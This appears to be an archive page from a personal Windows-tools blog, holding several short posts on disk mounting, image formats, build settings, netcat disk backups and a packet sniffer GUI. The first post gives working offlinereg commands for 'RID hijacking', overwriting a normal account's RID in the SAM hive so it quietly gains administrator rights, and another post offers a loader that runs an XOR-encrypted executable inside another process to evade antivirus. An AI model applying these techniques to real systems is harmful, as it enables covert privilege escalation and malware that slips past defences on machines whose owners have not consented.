Août 182019
 

Following a post here on how to blank an account’s password using offlinereg, this time, lets see how to perform « RID hijacking ».

The local admin account has a 01F4 rid.
What about « patching » another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite « stealthy » as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy…

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.

 

Download/Discuss it here

Juil 252019
 

Create your own filesystem and mount it as either a logical drive or folder. Dokan (https://github.com/dokan-dev/dokany)

Below a simple command line to mount a zip archive on X:
mount.exe /r test.zip /l x /x proxy_7zip.dll

Mount.exe is a generic code/binary independant of the filesystem you wish to create.
The filesystem is implemented in a proxy/dll.

Source code and binaries is available here.

7zip proxy example is here.

NFS proxy example is here.

Screenshot

Juil 252019
 

I had done a few proxies for ImDisk in the past based on the libyal libraries (vmdkqcowvhdewf).

This time, as the VDI image format is quite simple, I made my own proxy for VDI images.

Imdisk + Discutils could achieve the same except that discutils requires .Net 4.0 which is not always available.

As always the command line :

« server » -> devio –dll=proxy.dll;dllopen shm:test_proxy c:\temp\freedos.vdi
« client » -> imdisk -a -t proxy -o shm -o ro -f test_proxy -m x:
Use the start command in front of devio if you want to stuff it all in one batch.

Download/Discuss here.

Juil 222019
 

A demo to run a encrypted xored encrypted PE within the memory of another PE (and therefore possibly bypass anti virus softwares)

See https://github.com/erwan2212/XOR-freepascal about xoring / encrypting a file.

Code is currently set to use cmd.exe (x86/x64) as target host.

host32.exe/host64.exe are also provided in the zip if you wish the modify the code to use a « neutral » host.

Source code and binaries can be found here.

Mai 082019
 

I have added a 2 extra formats in latest version : VHD/VHDX and LZ4.

VHD/VHDX is using MS virtual disk API and LZ4 is using opensource LZ4 library.

While at it, I also added extra WIM compression methods (LZX and LZMS).

 

LZ4 is quite interesting as in some cases it is faster to compress thru LZ4 compared to using a RAW format and this despite the CPU overhead.

LZ4 files generated by Clonedisk are compatible with LZ4.exe.

 

 

VH7E1Fe.png

Avr 242019
 

How to rebuild libvmdk (and possibly any VC project) so that it depends on msvcrt.dll and no longer on msvcrtxxx.dll.

Copy/paste from this post for archiving.

-first install VC2008 express (but should be OK with VC2010 express and possibly newer VS platforms)

-install WDK 7.1

-modify your VC2008 IDE settings search paths (include and libraries) by adding WDK 7.1 paths first in the list

XuK0hGN.png

seLkgHG.png

-add msvcrt « legacy translator » library (msvcrt_win2000.obj) to Linker -> Input -> Additional Dependencies for both DLL projects (zlib and libvmdk)

ExRxofS.png

-add specific preprocessor definitions to zlib project :

vsnprintf=_vsnprintf;snwprintf=_snwprintf;open=_open;read=_read;close=_close;write=_write

neDR5uv.png?1

And voila :)

You should end up with the below, i.e a dependency to a msvcrt.dll

lcahBQh.png

Avr 212019
 

Following some notes around netcat here and here.

Some extra commands to backup a disk over the network :

-listen on port 9000 and dump the raw file
nc -v -l -p 9000 > dump.img
(restore with nc -v -l -p 9000 < dump.img)

-same but compressed with lz4 via stdin
nc -v -l -p 9000 | lz4.exe -1 stdin -f dump.lz4
(restore with lz4 -l -c dump.lz4 | nc -v -l -p 9000
and not with nc -v -l -p 9000 -e « lz4.exe -c dump.lz4 »)

-the same but with 7zip
nc -v -l -p 9000 | 7z a dump.7z -si
(restore with 7z e dump.7z -so | nc -v -l -p 9000)

-the same but with bzip2
nc -v -l -p 9000 | bzip2 -z > dump.gz
(restore with bzip2 -cd < dump.gz | nc -v -l -p 9000)

 

lz4 can be downloaded here.
bzip2 can be downloaded here.
7-zip can be downloaded here.
netcat can be downloaded here.

Fév 242019
 

A few days ago, I have shared a, command line, layer 3 network sniffer based on windivert (netdump here).

The command line version offers a few options like capture or not, choose the network layer or the forward layer, etc …

Thus, sometimes it is also nice to have a simple(« start/stop ») GUI.
Now done.
Source code and binaries here on github as usual…
This version will automatically save the capture to a dated pcap file.

https://imgur.com/nLQJnRl.png